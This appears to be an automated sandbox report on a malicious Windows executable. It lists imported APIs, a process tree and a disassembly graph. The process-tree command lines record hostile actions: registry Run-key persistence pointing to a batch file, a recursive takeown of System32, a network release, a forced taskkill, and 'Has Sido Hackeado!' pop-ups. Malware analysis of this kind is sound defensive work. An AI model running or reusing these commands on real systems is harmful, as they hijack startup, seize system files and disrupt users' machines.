                  KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, SetConsoleCtrlHandler, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, GetProcAddress, GetVersionExW, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, PeekNamedPipe, TerminateProcess, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, DuplicateHandle, CreatePipe, CreateProcessW, GetExitCodeProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, RegisterWaitForSingleObject
                  USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                  GDI32.DLLGetStockObject
                  COMCTL32.DLLInitCommonControlsEx
                  SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                  WINMM.DLLtimeBeginPeriod
                  OLE32.DLLCoInitialize, CoTaskMemFree
                  SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

                  Network Behavior

                  No network behavior found

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:1
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:2
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:3
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K Twain_20.cmd
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:4
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:5
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K Twain_20.cmd
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:6
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:7
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:8
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K Taskdl.bat
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:9
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:10
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\reg.exe
                  Wow64 process (32bit):false
                  Commandline:reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
                  Imagebase:0x7ff739f50000
                  File size:77'312 bytes
                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:12
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\takeown.exe
                  Wow64 process (32bit):false
                  Commandline:takeown /f "C:\Windows\System32" /r
                  Imagebase:0x7ff7dc160000
                  File size:66'560 bytes
                  MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  General

                  Target ID:13
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\reg.exe
                  Wow64 process (32bit):false
                  Commandline:reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
                  Imagebase:0x7ff739f50000
                  File size:77'312 bytes
                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:14
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\ipconfig.exe
                  Wow64 process (32bit):false
                  Commandline:ipconfig /release
                  Imagebase:0x7ff6dfc40000
                  File size:35'840 bytes
                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:15
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\taskkill.exe
                  Wow64 process (32bit):false
                  Commandline:taskkill /im DiskPart /f
                  Imagebase:0x7ff790340000
                  File size:101'376 bytes
                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:16
                  Start time:21:22:58
                  Start date:18/04/2024
                  Path:C:\Windows\System32\attrib.exe
                  Wow64 process (32bit):false
                  Commandline:attrib -r -a -s -h *.*
                  Imagebase:0x7ff7a58b0000
                  File size:23'040 bytes
                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:17
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:18
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:19
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:20
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:21
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:22
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:23
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:24
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:25
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:26
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:27
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\msg.exe
                  Wow64 process (32bit):false
                  Commandline:msg * Virus Detectado
                  Imagebase:0x7ff7ff4c0000
                  File size:27'136 bytes
                  MD5 hash:B42553599E40029366A0FD8F81079BED
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:28
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\msg.exe
                  Wow64 process (32bit):false
                  Commandline:msg * Virus Detectado
                  Imagebase:0x7ff7ff4c0000
                  File size:27'136 bytes
                  MD5 hash:B42553599E40029366A0FD8F81079BED
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:29
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\msg.exe
                  Wow64 process (32bit):false
                  Commandline:msg * Has Sido Hackeado!
                  Imagebase:0x7ff7ff4c0000
                  File size:27'136 bytes
                  MD5 hash:B42553599E40029366A0FD8F81079BED
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:30
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:31
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:32
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:notepad
                  Imagebase:0x7ff7144b0000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:33
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\calc.exe
                  Wow64 process (32bit):false
                  Commandline:calc
                  Imagebase:0x7ff704a90000
                  File size:27'648 bytes
                  MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:34
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:explorer.exe
                  Imagebase:0x7ff674740000
                  File size:5'141'208 bytes
                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:35
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\mspaint.exe
                  Wow64 process (32bit):false
                  Commandline:mspaint.exe
                  Imagebase:0x7ff6f1e00000
                  File size:988'160 bytes
                  MD5 hash:F221A4CCAFEC690101C59F726C95B646
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:36
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:37
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:38
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:39
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:notepad
                  Imagebase:0x7ff7144b0000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:40
                  Start time:21:23:03
                  Start date:18/04/2024
                  Path:C:\Windows\System32\calc.exe
                  Wow64 process (32bit):false
                  Commandline:calc
                  Imagebase:0x7ff704a90000
                  File size:27'648 bytes
                  MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:43
                  Start time:21:23:03
                  Start date:18/04/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:explorer.exe
                  Imagebase:0x7ff674740000
                  File size:5'141'208 bytes
                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:44
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:45
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Windows\System32\mspaint.exe
                  Wow64 process (32bit):false
                  Commandline:mspaint.exe
                  Imagebase:0x7ff6f1e00000
                  File size:988'160 bytes
                  MD5 hash:F221A4CCAFEC690101C59F726C95B646
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:46
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                  Imagebase:0x7ff6781e0000
                  File size:4'099'584 bytes
                  MD5 hash:94675EB54AC5DAA11ACE736DBFA9E7A2
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:47
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:48
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:49
                  Start time:21:23:05
                  Start date:18/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:notepad
                  Imagebase:0x7ff7144b0000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:50
                  Start time:21:23:05
                  Start date:18/04/2024
                  Path:C:\Windows\System32\calc.exe
                  Wow64 process (32bit):false
                  Commandline:calc
                  Imagebase:0x7ff704a90000
                  File size:27'648 bytes
                  MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:51
                  Start time:21:23:05
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:54
                  Start time:21:23:06
                  Start date:18/04/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:explorer.exe
                  Imagebase:0x7ff674740000
                  File size:5'141'208 bytes
                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:9.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:1.6%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:80
                    execution_graph 10541 401f4c 10542 40e660 21 API calls 10541->10542 10543 401f54 10542->10543 10564 40e520 GetLastError TlsGetValue SetLastError 10543->10564 10545 401f5a 10565 40e520 GetLastError TlsGetValue SetLastError 10545->10565 10547 401f6b 10548 40e6c0 4 API calls 10547->10548 10549 401f73 10548->10549 10566 40e520 GetLastError TlsGetValue SetLastError 10549->10566 10551 401f79 10567 40e520 GetLastError TlsGetValue SetLastError 10551->10567 10553 401f81 10568 40a190 10553->10568 10557 401f8e 10572 405182 TlsGetValue 10557->10572 10559 401f99 10560 408e27 20 API calls 10559->10560 10561 401fa2 10560->10561 10562 4051a0 3 API calls 10561->10562 10563 401fa7 10562->10563 10563->10563 10564->10545 10565->10547 10566->10551 10567->10553 10573 40a120 10568->10573 10571 40e720 TlsGetValue 10571->10557 10572->10559 10574 40a130 10573->10574 10574->10574 10575 40e900 3 API calls 10574->10575 10576 401f88 10575->10576 10576->10571 7485 401000 memset GetModuleHandleW HeapCreate 7486 401044 7485->7486 7538 40e4d0 HeapCreate TlsAlloc 7486->7538 7488 401053 7541 40b120 7488->7541 7490 40105d 7544 40a1c0 HeapCreate 7490->7544 7492 40106c 7545 409669 7492->7545 7494 401071 7550 408dee memset InitCommonControlsEx CoInitialize 7494->7550 7496 401076 7551 4053b5 InitializeCriticalSection 7496->7551 7498 40107b 7552 405068 7498->7552 7502 4010c3 7555 40aa5a 7502->7555 7506 4010e9 7507 40aa5a 16 API calls 7506->7507 7508 4010f4 7507->7508 7509 40a9c8 13 API calls 7508->7509 7510 40110f 7509->7510 7566 40e266 7510->7566 7512 40112d 7513 405068 4 API calls 7512->7513 7514 40113d 7513->7514 7515 40aa5a 16 API calls 7514->7515 7516 401148 7515->7516 7517 40a9c8 13 API calls 7516->7517 7518 401163 SetConsoleCtrlHandler 7517->7518 7572 409fb0 7518->7572 7520 401180 7578 40e520 GetLastError TlsGetValue SetLastError 7520->7578 7522 401186 7579 402eed 7522->7579 7526 401197 7604 401ba0 7526->7604 7529 4011a7 7900 402fad 7529->7900 7530 4011ac 7711 403f53 7530->7711 8031 40ed40 HeapAlloc HeapAlloc TlsSetValue 7538->8031 7540 40e4f7 7540->7488 8032 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 7541->8032 7543 40b12e 7543->7490 7544->7492 8033 40d9d3 7545->8033 7549 409687 InitializeCriticalSection 7549->7494 7550->7496 7551->7498 8045 40e7d0 7552->8045 7554 401095 GetStdHandle 7885 40a460 7554->7885 7556 40aa63 7555->7556 7557 4010ce 7555->7557 8052 40ab16 7556->8052 7895 40a9c8 HeapAlloc 7557->7895 7561 40aaa0 7563 40aab3 HeapFree 7561->7563 7564 40aaa7 HeapFree 7561->7564 7563->7557 7564->7563 7565 40aa8e HeapFree 7565->7561 7565->7565 8096 40e3b9 7566->8096 7569 40e283 RtlAllocateHeap 7570 40e2a2 memset 7569->7570 7571 40e2e6 7569->7571 7570->7571 7571->7512 7573 40a0d0 7572->7573 7574 40a0d8 7573->7574 7575 40a0fa SetUnhandledExceptionFilter 7573->7575 7576 40a0e1 SetUnhandledExceptionFilter 7574->7576 7577 40a0eb SetUnhandledExceptionFilter 7574->7577 7575->7520 7576->7577 7577->7520 7578->7522 8102 40e660 7579->8102 7583 402f02 8117 40e520 GetLastError TlsGetValue SetLastError 7583->8117 7585 402f57 8118 40e520 GetLastError TlsGetValue SetLastError 7585->8118 7587 402f5f 8119 40e520 GetLastError TlsGetValue SetLastError 7587->8119 7589 402f67 8120 40e520 GetLastError TlsGetValue SetLastError 7589->8120 7591 402f6f 8121 40d7a0 7591->8121 7595 402f8a 